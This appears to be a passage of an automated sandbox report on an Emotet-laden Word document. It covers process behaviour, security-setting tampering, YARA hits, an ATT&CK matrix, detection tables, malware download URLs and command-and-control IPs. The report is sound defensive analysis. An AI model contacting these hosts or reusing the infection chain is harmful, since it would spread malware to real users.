              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_615B5916 cpuid
              Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_615B5C3C GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

              Lowering of HIPS / PFW / Operating System Security Settings:

              barindex
              Changes security center settings (notifications, updates, antivirus, firewall)Show sources
              Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cvalJump to behavior
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA &apos;AntiVirusProduct&apos; OR TargetInstance ISA &apos;FirewallProduct&apos; OR TargetInstance ISA &apos;AntiSpywareProduct&apos;
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct
              Source: svchost.exe, 0000000A.00000002.533453735.000001A70123D000.00000004.00000001.sdmpBinary or memory string: ,@V%ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: svchost.exe, 0000000A.00000002.533595093.000001A701302000.00000004.00000001.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

              Stealing of Sensitive Information:

              barindex
              Yara detected EmotetShow sources
              Source: Yara matchFile source: 21.2.rundll32.exe.30146b8.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 21.2.rundll32.exe.30146b8.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000015.00000002.535111324.0000000002FFA000.00000004.00000020.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.416130132.0000000003025000.00000004.00000020.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000002.456337170.0000000000775000.00000004.00000020.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.377988081.0000000000475000.00000004.00000020.sdmp, type: MEMORY
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_615A1A40 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ,

              Mitre Att&ck Matrix

              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid AccountsWindows Management Instrumentation1DLL Side-Loading1DLL Side-Loading1Disable or Modify Tools2OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer3Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Default AccountsScripting12Application Shimming1Application Shimming1Deobfuscate/Decode Files or Information11LSASS MemoryFile and Directory Discovery2Remote Desktop ProtocolClipboard Data1Exfiltration Over BluetoothEncrypted Channel11Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsExploitation for Client Execution13Logon Script (Windows)Extra Window Memory Injection1Scripting12Security Account ManagerSystem Information Discovery145SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsCommand and Scripting Interpreter11Logon Script (Mac)Process Injection112Obfuscated Files or Information2NTDSQuery Registry1Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol3SIM Card SwapCarrier Billing Fraud
              Cloud AccountsPowerShell2Network Logon ScriptNetwork Logon ScriptDLL Side-Loading1LSA SecretsSecurity Software Discovery261SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol114Manipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.commonExtra Window Memory Injection1Cached Domain CredentialsProcess Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsStartup ItemsMasquerading21DCSyncVirtualization/Sandbox Evasion31Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
              Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobVirtualization/Sandbox Evasion31Proc FilesystemApplication Window Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
              Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Process Injection112/etc/passwd and /etc/shadowRemote System Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
              Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Hidden Files and Directories1Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
              Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronRundll321Input CapturePermission Groups DiscoveryReplication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 526179 Sample: 1711.doc Startdate: 22/11/2021 Architecture: WINDOWS Score: 100 56 85.214.67.203 STRATOSTRATOAGDE Germany 2->56 58 195.154.146.35 OnlineSASFR France 2->58 60 15 other IPs or domains 2->60 76 Sigma detected: Emotet RunDLL32 Process Creation 2->76 78 Multi AV Scanner detection for domain / URL 2->78 80 Found malware configuration 2->80 82 10 other signatures 2->82 12 WINWORD.EXE 185 41 2->12         started        16 svchost.exe 2->16         started        18 svchost.exe 9 1 2->18         started        21 8 other processes 2->21 signatures3 process4 dnsIp5 52 C:\Users\user\Desktop\~$1711.doc, data 12->52 dropped 92 Obfuscated command line found 12->92 23 cmd.exe 1 12->23         started        94 Changes security center settings (notifications, updates, antivirus, firewall) 16->94 26 MpCmdRun.exe 1 16->26         started        62 127.0.0.1 unknown unknown 18->62 64 192.168.2.1 unknown unknown 18->64 file6 signatures7 process8 signatures9 86 Suspicious powershell command line found 23->86 88 Obfuscated command line found 23->88 28 powershell.exe 15 20 23->28         started        33 conhost.exe 23->33         started        35 conhost.exe 26->35         started        process10 dnsIp11 66 alfaofarms.com 50.62.141.15, 49753, 80 AS-26496-GO-DADDY-COM-LLCUS United States 28->66 68 thepilatesstudionj.com 72.167.40.83, 49752, 80 AS-26496-GO-DADDY-COM-LLCUS United States 28->68 54 C:\ProgramData\13791789.dll, PE32 28->54 dropped 96 Powershell drops PE file 28->96 37 rundll32.exe 28->37         started        file12 signatures13 process14 signatures15 84 Tries to detect virtualization through RDTSC time measurements 37->84 40 rundll32.exe 2 37->40         started        process16 file17 50 C:\Windows\SysWOW64\...\oxhesd.gzk (copy), PE32 40->50 dropped 90 Hides that the sample has been downloaded from the Internet (zone.identifier) 40->90 44 rundll32.exe 40->44         started        signatures18 process19 process20 46 rundll32.exe 12 44->46         started        dnsIp21 70 168.197.250.14, 49795, 80 OmarAnselmoRipollTDCNETAR Argentina 46->70 72 51.178.61.60, 443, 49794 OVHFR France 46->72 74 45.79.33.48, 8080 LINODE-APLinodeLLCUS United States 46->74 98 System process connects to network (likely due to code injection or exploit) 46->98 signatures22

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.

              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              1711.doc40%VirustotalBrowse
              1711.doc20%MetadefenderBrowse
              1711.doc58%ReversingLabsDocument-Word.Trojan.Emotet

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\ProgramData\13791789.dll34%MetadefenderBrowse
              C:\ProgramData\13791789.dll81%ReversingLabsWin32.Trojan.Emotet
              C:\Windows\SysWOW64\Pnxoind\oxhesd.gzk (copy)34%MetadefenderBrowse
              C:\Windows\SysWOW64\Pnxoind\oxhesd.gzk (copy)81%ReversingLabsWin32.Trojan.Emotet

              Unpacked PE Files

              SourceDetectionScannerLabelLinkDownload
              16.2.rundll32.exe.670000.0.unpack100%AviraHEUR/AGEN.1110387Download File
              15.2.rundll32.exe.d00000.0.unpack100%AviraHEUR/AGEN.1110387Download File
              14.2.rundll32.exe.420000.0.unpack100%AviraHEUR/AGEN.1110387Download File
              21.2.rundll32.exe.2f70000.0.unpack100%AviraHEUR/AGEN.1110387Download File

              Domains

              SourceDetectionScannerLabelLink
              thepilatesstudionj.com2%VirustotalBrowse
              alfaofarms.com8%VirustotalBrowse

              URLs

              SourceDetectionScannerLabelLink
              https://cdn.entity.0%URL Reputationsafe
              https://45.79.33.48:8080/uDpHLeAeeItaVoryptography0%Avira URL Cloudsafe
              https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
              https://api.aadrm.com/0%URL Reputationsafe
              https://168.197.250.14:80/kvToeLsGeFZqJGKzCOcoHxsHCGcCDtetHLz0%Avira URL Cloudsafe
              https://staviancjs.com/wp-forum/QOm4n2/100%Avira URL Cloudmalware
              http://itomsystem.in/i9eg3y/nNxmmn9aTcv/.Split100%Avira URL Cloudmalware
              https://51.178.61.60/xlgRAUoKyrAaNnNNtTN30%Avira URL Cloudsafe
              https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
              https://officeci.azurewebsites.net/api/0%URL Reputationsafe
              https://store.office.cn/addinstemplate0%URL Reputationsafe
              http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
              https://51.178.61.60/xlgRAUoKyrAaNnNNtTNa0%Avira URL Cloudsafe
              http://crl.ver)0%Avira URL Cloudsafe
              https://www.odwebp.svc.ms0%URL Reputationsafe
              https://api.addins.store.officeppe.com/addinstemplate0%URL Reputationsafe
              https://dynamic.t0%URL Reputationsafe
              https://45.79.33.48/0%Avira URL Cloudsafe
              https://ncus.contentsync.0%URL Reputationsafe
              https://51.178.61.60/xlgRAUoKyrAaNnNNtTNh0%Avira URL Cloudsafe
              https://168.197.250.14:80/kvToeLsGeFZqJGKzCOcoHxsHCGcCDtetHL4053062332-10020%Avira URL Cloudsafe
              http://thepilatesstudionj.co0%Avira URL Cloudsafe
              https://45.79.33.48:8080/00%Avira URL Cloudsafe
              https://wus2.contentsync.0%URL Reputationsafe
              https://45.79.33.48:8080/20%Avira URL Cloudsafe
              http://crl.micr0%URL Reputationsafe
              https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/0%Avira URL Cloudsafe
              https://168.197.250.14/563209-4053062332-10020%Avira URL Cloudsafe
              https://skyapi.live.net/Activity/0%URL Reputationsafe
              https://168.197.250.14/W0%Avira URL Cloudsafe
              http://pesterbdd.com/images/Pester.pngp0%Avira URL Cloudsafe
              https://api.cortana.ai0%URL Reputationsafe
              https://staging.cortana.ai0%URL Reputationsafe
              https://wus2.pagecontentsync.0%URL Reputationsafe
              https://168.197.250.14:80/kvToeLsGeFZqJGKzCOcoHxsHCGcCDtetHL2q0%Avira URL Cloudsafe
              https://51.178.61.60/E0%Avira URL Cloudsafe
              http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/100%Avira URL Cloudmalware
              https://168.197.250.14:80/kvToeLsGeFZqJGKzCOcoHxsHCGcCDtetHL0%Avira URL Cloudsafe
              https://cortana.ai/api0%URL Reputationsafe
              https://168.197.250.14/h0%Avira URL Cloudsafe
              http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/0%Avira URL Cloudsafe
              https://45.79.33.48:8080/a0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              thepilatesstudionj.com
              72.167.40.83
              truetrueunknown
              alfaofarms.com
              50.62.141.15
              truetrueunknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/true
              • Avira URL Cloud: safe
              unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              https://shell.suite.office.com:1443228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drfalse
                high
                https://autodiscover-s.outlook.com/228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drfalse
                  high
                  https://dev.ditu.live.com/REST/v1/Traffic/Incidents/svchost.exe, 00000008.00000003.308971660.000001C419459000.00000004.00000001.sdmpfalse
                    high
                    https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drfalse
                      high
                      https://cdn.entity.228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drfalse
                      • URL Reputation: safe
                      unknown
                      https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drfalse
                        high
                        https://45.79.33.48:8080/uDpHLeAeeItaVoryptographyrundll32.exe, 00000015.00000002.535612360.0000000003095000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://rpsticket.partnerservices.getmicrosoftkey.com228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drfalse
                        • URL Reputation: safe
                        unknown
                        https://lookup.onenote.com/lookup/geolocation/v1228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drfalse
                          high
                          https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drfalse
                            high
                            https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drfalse
                              high
                              https://api.aadrm.com/228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drfalse
                              • URL Reputation: safe
                              unknown
                              https://168.197.250.14:80/kvToeLsGeFZqJGKzCOcoHxsHCGcCDtetHLzrundll32.exe, 00000015.00000002.535612360.0000000003095000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drfalse
                                high
                                https://api.microsoftstream.com/api/228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drfalse
                                  high
                                  https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drfalse
                                    high
                                    https://cr.office.com228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drfalse
                                      high
                                      https://staviancjs.com/wp-forum/QOm4n2/PowerShell_transcript.813435.2FeLMNmk.20211122110119.txt.5.drtrue
                                      • Avira URL Cloud: malware
                                      unknown
                                      http://itomsystem.in/i9eg3y/nNxmmn9aTcv/.Splitpowershell.exe, 00000005.00000002.339756684.000000000484F000.00000004.00000001.sdmptrue
                                      • Avira URL Cloud: malware
                                      unknown
                                      https://51.178.61.60/xlgRAUoKyrAaNnNNtTN3rundll32.exe, 00000015.00000002.535111324.0000000002FFA000.00000004.00000020.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000005.00000002.339588827.0000000004711000.00000004.00000001.sdmpfalse
                                        high
                                        https://res.getmicrosoftkey.com/api/redemptionevents228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://tasks.office.com228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drfalse
                                          high
                                          https://officeci.azurewebsites.net/api/228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drfalse
                                          • URL Reputation: safe
                                          unknown
                                          https://store.office.cn/addinstemplate228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000005.00000003.306238812.00000000077F4000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000005.00000003.306238812.00000000077F4000.00000004.00000001.sdmpfalse
                                            high
                                            https://51.178.61.60/xlgRAUoKyrAaNnNNtTNarundll32.exe, 00000015.00000002.535111324.0000000002FFA000.00000004.00000020.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drfalse
                                              high
                                              http://crl.ver)svchost.exe, 00000003.00000002.535889746.0000015127862000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              low
                                              https://www.odwebp.svc.ms228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drfalse
                                              • URL Reputation: safe
                                              unknown
                                              https://api.powerbi.com/v1.0/myorg/groups228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drfalse
                                                high
                                                https://web.microsoftstream.com/video/228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drfalse
                                                  high
                                                  https://api.addins.store.officeppe.com/addinstemplate228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://dev.virtualearth.net/REST/v1/Locationssvchost.exe, 00000008.00000003.308866917.000001C419460000.00000004.00000001.sdmpfalse
                                                    high
                                                    https://graph.windows.net228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drfalse
                                                      high
                                                      https://github.com/Pester/Pesterpowershell.exe, 00000005.00000003.306238812.00000000077F4000.00000004.00000001.sdmpfalse
                                                        high
                                                        https://github.com/Pester/Pesterppowershell.exe, 00000005.00000002.339756684.000000000484F000.00000004.00000001.sdmpfalse
                                                          high
                                                          https://dynamic.tsvchost.exe, 00000008.00000002.309921606.000001C419462000.00000004.00000001.sdmp, svchost.exe, 00000008.00000003.308889195.000001C41945C000.00000004.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://45.79.33.48/rundll32.exe, 00000015.00000002.535367737.000000000304B000.00000004.00000020.sdmp, rundll32.exe, 00000015.00000002.535612360.0000000003095000.00000004.00000001.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drfalse
                                                            high
                                                            https://dev.virtualearth.net/REST/v1/Routes/Transitsvchost.exe, 00000008.00000003.308866917.000001C419460000.00000004.00000001.sdmpfalse
                                                              high
                                                              https://ncus.contentsync.228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drfalse
                                                                high
                                                                http://weather.service.msn.com/data.aspx228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drfalse
                                                                  high
                                                                  https://51.178.61.60/xlgRAUoKyrAaNnNNtTNhrundll32.exe, 00000015.00000002.535111324.0000000002FFA000.00000004.00000020.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drfalse
                                                                    high
                                                                    https://168.197.250.14:80/kvToeLsGeFZqJGKzCOcoHxsHCGcCDtetHL4053062332-1002rundll32.exe, 00000015.00000002.535612360.0000000003095000.00000004.00000001.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drfalse
                                                                      high
                                                                      http://thepilatesstudionj.copowershell.exe, 00000005.00000002.343021094.0000000004CAE000.00000004.00000001.sdmptrue
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/svchost.exe, 00000008.00000003.308971660.000001C419459000.00000004.00000001.sdmpfalse
                                                                        high
                                                                        https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=svchost.exe, 00000008.00000003.308889195.000001C41945C000.00000004.00000001.sdmpfalse
                                                                          high
                                                                          https://45.79.33.48:8080/0rundll32.exe, 00000015.00000002.535612360.0000000003095000.00000004.00000001.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://wus2.contentsync.228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          https://clients.config.office.net/user/v1.0/ios228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drfalse
                                                                            high
                                                                            https://dev.virtualearth.net/REST/v1/Routes/Drivingsvchost.exe, 00000008.00000003.308866917.000001C419460000.00000004.00000001.sdmpfalse
                                                                              high
                                                                              https://o365auditrealtimeingestion.manage.office.com228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drfalse
                                                                                high
                                                                                https://outlook.office365.com/api/v1.0/me/Activities228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drfalse
                                                                                  high
                                                                                  https://45.79.33.48:8080/2rundll32.exe, 00000015.00000002.535612360.0000000003095000.00000004.00000001.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://clients.config.office.net/user/v1.0/android/policies228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drfalse
                                                                                    high
                                                                                    https://entitlement.diagnostics.office.com228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drfalse
                                                                                      high
                                                                                      https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drfalse
                                                                                        high
                                                                                        https://outlook.office.com/228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drfalse
                                                                                          high
                                                                                          https://storage.live.com/clientlogs/uploadlocation228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drfalse
                                                                                            high
                                                                                            https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=svchost.exe, 00000008.00000003.287038973.000001C419431000.00000004.00000001.sdmpfalse
                                                                                              high
                                                                                              https://substrate.office.com/search/api/v1/SearchHistory228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drfalse
                                                                                                high
                                                                                                https://graph.windows.net/228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drfalse
                                                                                                  high
